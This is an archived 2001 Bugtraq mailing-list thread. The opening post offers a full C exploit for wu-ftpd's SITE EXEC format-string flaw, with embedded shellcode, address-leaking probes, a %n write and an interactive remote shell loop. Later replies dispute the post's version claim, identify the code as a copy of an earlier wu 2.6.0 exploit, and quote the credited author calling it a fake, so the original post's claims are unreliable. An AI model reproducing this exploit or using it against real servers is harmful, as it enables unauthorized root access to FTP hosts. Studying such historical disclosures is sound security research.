6185791 2001-03-07 04:40 +0100 /283 rader/ Nomen Nescio <nobody@DIZUM.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-03-07 21:56 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: nobody@DIZUM.COM
Mottagare: Bugtraq (import) <15805>
Ärende: wu-ftpd
------------------------------------------------------------
From: Nomen Nescio <nobody@DIZUM.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <e01141c29072cd2bc40439162ba87800@dizum.com>
hi,
this is an exploit for wu-ftpd 2.6.1(1) on linux
propz to segv for giving this to me
bringin' you the 0day from the hackweiser crew, australian
+chapter
cya,
Till
----
/*
* Linux wu-ftpd - 2.6.1(1)
*
* DiGiT
*/
#include <sys/socket.h>
#include <sys/types.h>
#include <stdio.h>
#include <netinet/in.h>
#include <netdb.h>
char linuxcode[] =
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb"
"\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31"
"\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27"
"\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31"
"\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d"
"\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46"
"\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8"
"\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
"\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff"
"\x30\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31";
main (int argc, char *argv[])
{
char cmdbuf[8192];
char cbuf[1024];
char *t;
char nop[400];
int pip, i, a = 22, st = 0;
struct sockaddr_in sck;
struct hostent *hp;
long inet;
int port = 21;
fd_set fds;
unsigned int aa;
long reta, retb, tmp, retz;
int ret;
int add = 0;
memset (cmdbuf, 0x0, sizeof (cmdbuf));
memset (cbuf, 0x0, sizeof (cbuf));
memset (nop, 0x0, sizeof (nop));
if (argc < 2)
{
fprintf (stderr, "Usage: %s [ip] \n", argv[0]);
exit (-1);
}
pip = socket (PF_INET, SOCK_STREAM, 0);
if (!pip)
{
perror ("socket()");
exit (-1);
}
inet = inet_addr (argv[1]);
if (inet == -1)
{
if (hp = gethostbyname (argv[1]))
memcpy (&inet, hp->h_addr, 4);
else
inet = -1;
if (inet == -1)
{
fprintf (stderr, "Cant resolv %s!! \n", argv[1]);
exit (-1);
}
}
sck.sin_family = PF_INET;
sck.sin_port = htons (port);
sck.sin_addr.s_addr = inet;
if (connect (pip, (struct sockaddr *) &sck, sizeof (sck)) < 0)
{
perror ("Connect() ");
exit (-1);
}
read (pip, cbuf, 1023);
fprintf (stderr, "Connected to: %s \n", argv[1]);
fprintf (stderr, "Banner: %s \n", cbuf);
strcpy (cmdbuf, "user ftp\n");
write (pip, cmdbuf, strlen (cmdbuf));
memset (nop, 0x90, sizeof (nop) - strlen (linuxcode) - 10);
strcat (nop, linuxcode);
memset (cmdbuf, 0x0, sizeof (cmdbuf));
sprintf (cmdbuf, "pass %s\n", nop);
write (pip, cmdbuf, strlen (cmdbuf));
sleep (1);
read (pip, cmdbuf, sizeof (cmdbuf) - 1);
memset (cmdbuf, 0x0, sizeof (cmdbuf));
if (!strncmp (cmdbuf, "530", 3))
{
printf ("loggin incorrect : %s \n", cmdbuf);
exit (-1);
}
fprintf (stderr, "Logged in.. \n");
fprintf (stderr, "+ Finding ret addresses \n");
memset (cmdbuf, 0x0, sizeof (cmdbuf));
strcpy (cmdbuf, "SITE EXEC %x %x %x %x +%x |%x\n");
write (pip, cmdbuf, strlen (cmdbuf));
sleep (1);
memset (cmdbuf, 0x0, sizeof (cmdbuf));
read (pip, cmdbuf, sizeof (cmdbuf) - 1);
if (!strncmp (cmdbuf + 4, "%x", 2))
{
fprintf (stderr, "[1m[31mWuftpd is not vulnerable : %s \n[0m",
cmdbuf);
exit (-1);
}
else
{
fprintf (stderr, "[1m[32mWuftpd is vulnerable : %s \n[0m",
cmdbuf);
}
reta = strtoul (strstr (cmdbuf, "|") + 1, strstr (cmdbuf, "|") +
11, 16);
retz = strtoul (strstr (cmdbuf, "+") + 1, strstr (cmdbuf, "|") +
11, 16);
memset (cmdbuf, 0x0, sizeof (cmdbuf));
strcpy (cmdbuf, "SITE EXEC ");
for (ret = 0; ret <= 88; ret++)
{
strcat (cmdbuf, "%x");
}
strcat (cmdbuf, "|%x\n");
write (pip, cmdbuf, strlen (cmdbuf));
sleep (1);
memset (cmdbuf, 0x0, sizeof (cmdbuf));
read (pip, cmdbuf, sizeof (cmdbuf) - 1);
retb = strtoul (strstr (cmdbuf, "|") + 1, strstr (cmdbuf, "|") +
11, 16);
printf ("Ret location befor: %x \n", reta);
if (reta == 0)
reta = retz;
else
add = 600;
reta = reta - 0x58;
retb = retb + 100 - 0x2569 - add;
printf ("Ret location : %x \n", reta);
printf ("Proctitle addres : %x and %u \n", retb, retb);
sleep (2);
memset (cmdbuf, 0x0, sizeof (cmdbuf));
sprintf (cmdbuf, "SITE EXEC
aaaaaaaaaaaaaaaaaaaaaaaaaabbbb%c%c\xff%c%c",
(reta & 0x000000ff), (reta & 0x0000ff00) >> 8,
(reta & 0x00ff0000) >> 16, (reta & 0xff000000) >> 24);
a = 22;
memset (cbuf, 0x0, sizeof (cbuf));
while (1)
{
memset (cmdbuf, 0x0, sizeof (cmdbuf));
sprintf (cmdbuf, "SITE EXEC
aaaaaaaaaaaaaaaaaaaaaaaaaabbbb%c%c\xff%c%c",
(reta & 0x000000ff), (reta & 0x0000ff00) >> 8,
(reta & 0x00ff0000) >> 16, (reta & 0xff000000) >> 24);
for (i = 0; i <= 128; i++)
strcat (cmdbuf, "%.f");
for (i = 0; i <= a; i++)
strcat (cmdbuf, "%d");
sprintf (cbuf, "|%%x|%%x\n", aa + 9807 - 460);
strcat (cmdbuf, cbuf);
write (pip, cmdbuf, strlen (cmdbuf));
memset (cmdbuf, 0x0, sizeof (cmdbuf));
read (pip, cmdbuf, sizeof (cmdbuf) - 1);
t = (char *) strstr (cmdbuf, "|");
tmp = strtoul (t + 1, t + 11, 16);
if (tmp != 0)
{
fprintf (stderr, "tmp 1 : 0x%x\n", tmp);
if (tmp == reta)
{
fprintf (stderr, "Cached a : %d \n", a);
st = 1;
break;
}
tmp = strtoul (t + 11, t + 22, 16);
fprintf (stderr, "tmp 2 : 0x%x\n", tmp);
if (tmp == reta)
{
fprintf (stderr, "Cached a : %d \n", a);
st = 2;
break;
}
}
if (st > 0)
break;
a++;
}
sleep (1);
memset (cmdbuf, 0x0, sizeof (cmdbuf));
memset (cbuf, 0x0, sizeof (cbuf));
sprintf (cmdbuf, "SITE EXEC
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb%c%c\xff%c%c",
(reta & 0x000000ff), (reta & 0x0000ff00) >> 8,
(reta & 0x00ff0000) >> 16, (reta & 0xff000000) >> 24);
for (i = 0; i <= 128; i++)
strcat (cmdbuf, "%.f");
if (add != 600)
a = a - 1;
fprintf (stderr, "Trying with : %d \n", a);
for (i = 0; i <= a; i++)
strcat (cmdbuf, "%d");
aa = retb;
if (add == 600)
sprintf (cbuf, "|%%.%ud%%n\n", aa + 9807);
else
sprintf (cbuf, "|%%.%ud%%n\n", aa + 9807 - 480);
strcat (cmdbuf, cbuf);
write (pip, cmdbuf, strlen (cmdbuf));
memset (cmdbuf, 0x0, sizeof (cmdbuf));
read (pip, cmdbuf, sizeof (cmdbuf) - 1);
memset (cmdbuf, 0x0, sizeof (cmdbuf));
fprintf (stderr, "[1m[33m Wait for a shell.....\n[0m");
while (1)
{
FD_ZERO (&fds);
FD_SET (0, &fds);
FD_SET (pip, &fds);
select (255, &fds, NULL, NULL, NULL);
if (FD_ISSET (pip, &fds))
{
memset (cbuf, 0x0, sizeof (cbuf));
ret = read (pip, cbuf, sizeof (cbuf) - 1);
if (ret <= 0)
{
printf ("Connection closed - EOF \n");
exit (-1);
}
printf ("%s", cbuf);
}
if (FD_ISSET (0, &fds))
{
memset (cbuf, 0x0, sizeof (cbuf));
read (0, cbuf, sizeof (cbuf) - 1);
write (pip, cbuf, strlen (cbuf));
}
}
close (pip);
}
_______________________________
The Proton
<proton@dshs.nsw.edu.au>
_______________________________
(6185791) ------------------------------------------
Kommentar i text 6186637 av Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
Kommentar i text 6186670 av predator <preedator@SENDMAIL.RU>
6186670 2001-03-07 22:56 +0100 /32 rader/ predator <preedator@SENDMAIL.RU>
Sänt av: joel@lysator.liu.se
Importerad: 2001-03-08 02:35 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: preedator@SENDMAIL.RU
Mottagare: Bugtraq (import) <15811>
Kommentar till text 6185791 av Nomen Nescio <nobody@DIZUM.COM>
Ärende: wu-ftpd
------------------------------------------------------------
From: predator <preedator@SENDMAIL.RU>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <3AA6AE9B.A410DE70@sendmail.ru>
Nomen Nescio wrote:
>
> hi,
>
> this is an exploit for wu-ftpd 2.6.1(1) on linux
> propz to segv for giving this to me
>
> bringin' you the 0day from the hackweiser crew, australian
> +chapter
>
> cya,
> Till
>
> ----
>
> /*
> * Linux wu-ftpd - 2.6.1(1)
> *
> * DiGiT
> */
Correct me if I'm wrong,but this is exploit for wu 2.6.0 not
2.6.1...This format string bug has been fixed in 2.6.1.
--
signoff predator
(6186670) ------------------------------------------
6186831 2001-03-07 22:55 +0100 /27 rader/ Jogchem de Groot <c.dgroot@CHELLO.NL>
Sänt av: joel@lysator.liu.se
Importerad: 2001-03-08 08:03 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: c.dgroot@CHELLO.NL
Mottagare: Bugtraq (import) <15815>
Ärende: Re: wu2.6.1 exploit
------------------------------------------------------------
From: Jogchem de Groot <c.dgroot@CHELLO.NL>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <01030722554001.00974@kryptology>
jogchem@kryptology:~$ diff wu2.6.1.c wu-lnx.c
jogchem@kryptology:~$
Exactly the same as the previously release wu-lnx.c exploit.
http://packetstorm.securify.com/0009-exploits/wu-lnx.c
kinda a hoax?? :)
On Wednesday 07 March 2001 04:40, you wrote:
> hi,
>
> this is an exploit for wu-ftpd 2.6.1(1) on linux
> propz to segv for giving this to me
>
> bringin' you the 0day from the hackweiser crew, australian
> +chapter
>
> cya,
> Till
-------------------------------------------------------
(6186831) ------------------------------------------
6190826 2001-03-07 23:42 -0500 /58 rader/ John <johns@TAMPABAY.RR.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-03-08 20:05 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: johns@TAMPABAY.RR.COM
Mottagare: Bugtraq (import) <15821>
Kommentar till text 6185791 av Nomen Nescio <nobody@DIZUM.COM>
Ärende: Re: Wu 2.6.1 exploit
------------------------------------------------------------
From: John <johns@TAMPABAY.RR.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <3AA70DC8.82BF9B1A@tampabay.rr.com>
I just posted another messages to Bugtraq before I read a post
to Anti Security from DiGiT. His comments are below.
digit
07.03.01 22:32:22
Subject: wu-ftpd fake on BUGTRAQ
Action: REPLY, NEW.
Before everyone starts flaming me or antisec about that post to
BUGTRAQ about wu-ftpd 2.6.1 you must realize that I did not write
that "exploit" which is on bugtraq. In fact anyone who closely
inspects the "exploit" will see that it is actually a fake
exploit. However I cant say for sure wether it is a trojan.
This might be an attempt to undermine my credibility with antisec? If
so,
it would be an extremely cheap shot.
Nomen Nescio wrote:
>
> hi,
>
> this is an exploit for wu-ftpd 2.6.1(1) on linux
> propz to segv for giving this to me
>
> bringin' you the 0day from the hackweiser crew, australian
> +chapter
>
> cya,
> Till
>
> ----
>
> /*
> * Linux wu-ftpd - 2.6.1(1)
> *
> * DiGiT
> */
>
> _______________________________
> The Proton
> <proton@dshs.nsw.edu.au>
> _______________________________
--
The events which transpired five thousand years ago;
Five years ago or five minutes ago, have determined
what will happen five minutes from now; five years
From now or five thousand years from now.
All history is a current event."
- Dr John Henrik Clake -
(6190826) --------------------------------(Ombruten)